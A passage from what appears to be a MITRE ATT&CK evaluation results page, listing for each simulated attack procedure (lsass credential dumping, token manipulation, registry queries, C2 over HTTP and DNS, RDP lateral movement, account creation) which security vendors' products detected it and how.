None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. Vendor states that the capability would normally block credential dumping activity like this, but the mitigation capability was disabled due to the evaluation parameters.
Carbon Black
Telemetry
Telemetry showed an open handle to a thread into lsass.exe, which is indicative of process injection. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Enrichment
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), as well as an lsass process accessed (ProcessHollowingDetected). [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated for svchost.exe reflectively loading a malicious executable, identified as Mimikatz, then accessing lsass. The alert was also tagged with the correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation). The powerkatz.dll was also seen loaded as a floating executable code. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry
Telemetry showed privileged accesses (PROCESS_VM_READ and PROCESS_QUERY_LIMITED_INFORMATION) into lsass.exe. [1] [2] [3] [4] [5]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2]
GoSecure
General Behavior
A General Behavior alert was generated when a DDNA Scan alerted for svchost.exe. DDNA scan results showed that svchost.exe "appeared to inject code into another process." According to the vendor, DDNA scans trigger due to machine learning scanning in-memory code and identifying that the code is malicious. DDNA output, which is delayed, shows the process capabilities (known as "traits"), which may give an analyst clues on what the process does. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A Specific Behavior alert was generated for process injection into lsass.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Specific Behavior
A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe. The alert was tagged with a related ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed an open handle to a thread into lsass.exe, which is indicative of process injection for credential dumping. [1] [2] [3]
CrowdStrike
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Telemetry
Telemetry for the lsass remote thread and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a previous detection. OverWatch is the managed threat hunting service. [1] [2] [3]
Specific Behavior (Tainted)
A second Specific Behavior alert was generated for Credential Dumping, which indicated that "a remote thread in LSASS accessed credential registry keys." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Cybereason
Telemetry (Tainted)
Telemetry showed svchost.exe injecting into lsass.exe. The telemetry was tainted by the parent “injected (svchost.exe > lsass.exe)” alert. The hashdumpx64.dll was also seen loaded as a floating executable code. [1] [2] [3] [4]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the correct ATT&CK Technique (Credential Dumping). [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Enrichment
The capability enriched svchost.exe injecting a thread into lsass.exe with a tag identifying credential dumping. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed a thread create within lsass.exe from svchost.exe, which could be indicative of credential dumping. The telemetry was tainted by the parent "Powershell process created" and "Policy Remote Process Compromise" alerts. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Enrichment (Tainted)
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for svchost dumping credentials via the Registry. The alert was tagged with the correct ATT&CK Technique (Credential Dumping). [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. Vendor states that the capability would normally block credential dumping activity like this, but the mitigation capability was disabled due to the evaluation parameters.
Carbon Black
Specific Behavior
A Specific Behavior alert was generated showing the correct ATT&CK Technique (Credential Dumping). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed a new thread and open handle into lsass.exe, which is indicative of process injection for credential dumping. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Enrichment
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), malicious process hollowing (ProcessHollowingDetected), and a remote process injecting code into lsass (LsassInjectedCode). [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated for svchost.exe injection into lsass.exe. The alert was mapped with the correct ATT&CK Tactic (Defense Evasion, Privilege Escalation) and Technique (Process Injection). The hashdumpx64.dll was also seen loaded as a floating executable code. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the correct ATT&CK Technique (Process Injection). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed multiple privileged accesses (including PROCESS_CREATE_THREAD) into lsass, indicative of Process Injection (tainted by the Process Injection alert). [1] [2] [3] [4] [5]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2]
F-Secure
Enrichment
The capability enriched svchost.exe injecting a thread into lsass.exe with a tag identifying thread injection. [1] [2]
GoSecure
General Behavior
A General Behavior alert was generated when a DDNA Scan alerted for svchost.exe. The DDNA scan results showed that svchost.exe "appeared to inject code into another process." According to the vendor, DDNA scans trigger due to machine learning scanning in-memory code and identifying that the code is malicious. DDNA output, which is delayed, shows the process capabilities (known as "traits"), which may give an analyst clues on what the process does. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for process hijacking based on a thread create within lsass.exe from svchost.exe (tainted by the parent "Powershell process created" and "Policy Remote Process Compromise" alerts.) The vendor noted Privilege Escalation is one of ten "Capabilities" that are part of the taxonomy. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A Specific Behavior alert was generated for process injection into lsass.exe. The alert was rolled up under the prior lsass.exe process injection alert and the last activity seen field was updated. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe injecting into svchost.exe (not counted for detection) then invoking a remote thread into lsass.exe. Powershell.exe was listed as the source of the remote thread into lsass.exe instead of svchost.exe because the alert on powershell.exe came before other events and therefore had increased precedence. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed a change in user execution context from Debbie to George between parent and child processes, which is indicative of token manipulation. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry showed the compromised process (21898821890) running as Debbie, then children from this process spawning first as Debbie and later as George. This could indicate theft of George's token within the context of the process. [1]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe associated with both users Debbie and George, indicating user context change via token manipulation. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3]
Endgame
Specific Behavior
A Specific Behavior alert was generated for Privilege Escalation based on rundll32.exe as Debbie, spawning the process cmd.exe as George, which indicated a possible stolen token. The alert was mapped to the correct ATT&CK Technique (T1134 - Access Token Manipulation) and Tactics (Privilege Escalation, Defense Evasion). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed the users change in the parent-child processes of rundll32.exe and cmd.exe (tainted by the Privilege Escalation alert). [1] [2] [3] [4]
FireEye
Telemetry
Telemetry showed a process (net.exe) executed during Step 4 as user Debbie and a subsequent process (reg.exe) executed during Step 6 as user George, indicating a change in user context from a stolen token. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
Telemetry
Telemetry showed a change in user execution context from Debbie to George between processes, which is indicative of token manipulation. [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed svchost.exe as a high integrity process from SYSTEM and subsequent cmd.exe process running as user George (tainted by the parent alert on suspicious process injection into lsass.exe). Svchost.exe was executed with seclogon command-line argument indicating token manipulation. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Enrichment
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the reg query command was suspicious. The alert was tainted by the parent cmd.exe process. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the parent cmd.exe process. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5]
Endgame
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent Process Injection alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified reg.exe as a reconnaissance command to enumerate a Registry key on the host Conficker to determine the configuration of its Windows Terminal Server service. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). An alert was also generated for a File Write To Named Pipe (Weak Signal) for reg.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe identifying that a sensitive Registry key was accessed which could be used for recon. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing reg with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. Telemetry also showed that two PIPEs were created as a result of reg.exe execution. The telemetry was tainted by the parent "Powershell process created" alert. [1] [2] [3] [4] [5]
McAfee
General Behavior (Delayed)
A General Behavior alert was generated indicating that reg.exe command-line arguments contains signs of malicious usage such as encoded content or interacting with Registry keys. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the Registry was queried via execution of the reg.exe utility. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of reg.exe executing with command-line arguments. The telemetry was tainted by the relationship to prior rundll32.exe activity based on process injection alert context. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment (Tainted)
The capability enriched the execution of reg.exe as querying a remote key. The data was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment
The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched the network connections from rundll32.exe with the correct ATT&CK Technique (T1043 - Commonly Used Port). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed network connections over TCP port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed a connection over TCP port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe opening a connection over port 80. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched rundll32.exe opening a connection to the C2 server over a \"HTTP port\" with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed a TCP port 80 connection from rundll32.exe to 192.168.0.4 (C2 server). The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain).  Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed a connection over port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed network connections over port 80 to 192.168.0.4 (C2 server) initiated from rundll32.exe. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed an outbound network connection from rundll32.exe to 192.168.0.4 (C2 server) over TCP port 80. The telemetry was tainted by the parent "Sponsor Process Established Network Connection" alert. [1] [2] [3]
McAfee
Telemetry
Telemetry showed connections over TCP port 80 to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5]
Enrichment
The capability enriched rundll32.exe (the process that made the network connection) with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for rundll32.exe opening a connection to 192.186.0.4 (C2 server) over port 80. The telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed port 80 command and control traffic. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed connections over TCP port 80 to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed a port 80 connection to 192.168.0.4 (C2 server) that was associated with the rundll32 parent process. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed network connections over TCP port 80 as well as a modload showing winhttp.dll was loaded, which an analyst could use to determine HTTP was used. [1] [2] [3]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to 192.168.0.4 (C2 server) on port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5] [6]
Cybereason
Enrichment (Tainted)
The capability enriched rundll32.exe opening an unusual network connection to the C2 server over the port 80 "HTTP port.” The data was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol), and also showed the amount of transmitted/received bytes as well as that the winhttp.dll module was loaded (which an analyst could use to determine HTTP was used). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5]
FireEye
Telemetry
Telemetry showed HTTP GET requests over port 80 to 192.168.0.4 (C2 server). [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over HTTP to www.freegoogleadsenseinfo.com (C2 domain). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a trace of HTTP connections being made by rundll32.exe to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5]
GoSecure
Telemetry
Telemetry showed an outbound HTTP request to www.freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4]
McAfee
Telemetry
Telemetry showed network connections over TCP port 80 and that winhttp.dll module was loaded into the same process (PID 6276) that made the network connection, which an analyst could use to determine HTTP was used. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to port 80 (no detection showed HTTP specifically). [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry
Telemetry showed port 80 command and control traffic as well as the loading of winhttp.dll, which an analyst could use to determine HTTP was used. [1] [2]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed a connection to TCP port 80 (no detection showed HTTP specifically). [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. Telemetry showed a connection to port 80 (no detection showed HTTP specifically). [1] [2]
Carbon Black
Telemetry
Telemetry showed separate network connections over port TCP port 80 and UDP port 53, which could indicate multiband communication. [1] [2]
CrowdStrike
Telemetry (Tainted)
Telemetry showed connections over both DNS and TCP port 80, which could indicate multiband communication. The DNS connections were tainted by a parent Exfiltration alert. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed the same rundll32.exe opening a connection over port 80 while making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process. [1]
Endgame
Telemetry (Tainted)
Telemetry showed connections over DNS as well as over port 80, which could indicate multiband communication. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) in addition to the ongoing DNS C2. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
Telemetry
Telemetry showed a combination of both DNS requests as well as HTTP requests, which could indicate multiband communication. [1] [2]
F-Secure
Telemetry
Telemetry showed rundll32.exe making network connections over port 80 to 192.168.0.4 (C2 server) as well as earlier identified DNS queries, which could indicate multiband communication. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed C2 traffic was over TCP port 80 as well as earlier traffic over DNS, which could indicate multiband communication. The HTTP telemetry over TCP port 80 was tainted by the parent "Sponsor Process Established Network Connection" alert. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Telemetry (Tainted)
Telemetry showed an execution sequence for rundll32.exe opening a connection to 192.168.0.4 (C2 server) over port 80, and prior activity showed DNS traffic to the same C2 IP address, which could indicate multiband communication. The port 80 telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe. [1] [2] [3]
Palo Alto Networks
Telemetry
Telemetry showed command and control traffic for both ports 80 and 53 . [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed port 80 connections to 192.168.0.4 (C2 server) and DNS requests for freegoogleadsenseinfo.com (C2 domain), which could indicate multiband communication. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Enrichment
The capability enriched the rdpclip.exe events with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry showed a connection to 10.0.0.5 (Conficker) over TCP port 3389 as well as rdpclip.exe executing. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed a connection for logon type 10 (interactive logon) and a connection to 10.0.0.5 (Conficker) over TCP port 3389. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because they identified suspicious communications over port 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) with Remote Interactive Logon Type. The telemetry was tainted by a parent Injected Shellcode alert listed as the owner process Telemetry also showed rdpclip.exe executing on 10.0.0.5 (Conficker). [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed a connection over port 3389 to 10.0.0.5 (Conficker) as well as a Type 10 (interactive remote) login event by user George on Conficker. The port 3389 telemetry was tainted by a parent Process Injection alert. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched the RDP connection from rundll32.exe with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed rundll32.exe making network connections to 10.0.0.5 (Conficker) over port 3389. [1] [2] [3]
GoSecure
Telemetry
Telemetry also identified an inbound connection to Conficker over TCP port 3389. [1] [2] [3] [4]
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe creating an outbound TCP port 3389 (RDP) connection from Nimda and enriched the connection with the conditions Lateral Movement and Remote Share Access. The enrichment was tainted by the parent \"Windows command prompt invoked\" alert. At least one condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4]
McAfee
Enrichment
The capability enriched rundll32.exe (the process that made the network connection) with the correct ATT&CK Tactic (Lateral Movement) and the Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry showed a connection to 10.0.0.5 (Conficker) over TCP port 3389. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry showed the execution sequence for cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). Logon activity over the last 30 days on Conficker shows George with a logon type 10 RemoteInteractive logon event. Telemetry also showed George logged into Conficker and displayed a movement graph of activity from user account Debbie to George. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5]
General Behavior (Tainted)
A General Behavior alert was generated for an unexpected process using the RDP port. The data was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed cmd.exe connecting to 10.0.0.5 (Conficker) over port 3389. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed a port 3389 connection. The telemetry was tainted by the activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed Registry modification events related to the creation of the user account Jesse. [1] [2]
Enrichment (Configuration Change)
The capability enriched lsass.exe with the tag \"Create Accounts using GUI\". The enrichment was added as a configuration change during the action and was not part of the original set of detections when the evaluation started. [1] [2]
CrowdStrike
Telemetry
Telemetry showed the creation of the user Jesse and the user being added to the domain admin group. [1] [2] [3]
Cybereason
Telemetry
Telemetry showed lsass.exe creating a Registry key for user Jesse, indicating that the user is new. [1]
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
Telemetry
Telemetry from Conficker showed the creation of the new user Jesse. [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the creation of a local user account for Jesse on Conficker. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
F-Secure
Telemetry
Telemetry showed the creation of the new user Jesse. [1]
GoSecure
Specific Behavior (Configuration Change)
A Specific Behavior alert named "New user account created" was generated based on the Registry change identifying that the new user Jesse was created. A child event of the alert indicated that the account had been added to the local admins group (but did not identify the account creation specifically). This alert was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Telemetry
Telemetry showed the creation of the user Jesse. [1]
Microsoft
Telemetry (Configuration Change)
Telemetry showed data for account Jesse creation after configuration change to enable collection of event ID 4720. Visibility of account creation data was verified in retesting at the end of the evaluation after vendor adjusted data collection configuration and visibility of account creation. [1]
Palo Alto Networks
Enrichment
The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Create Account). [1] [2]
Telemetry
Telemetry showed mmc.exe creating a Registry key for user Jesse, indicating that the user is new. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry
Telemetry showed the creation of the user Jesse which was noted from SAM Registry events. [1]
Carbon Black
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
CrowdStrike
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Cybereason
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Endgame
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
FireEye
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
F-Secure
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in) (tainted by the parent "LSA Registry Key modified" alert). [1]
McAfee
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Microsoft
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in). [1]
Palo Alto Networks
Enrichment
The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Graphical User Interface). [1] [2]
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Telemetry
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry
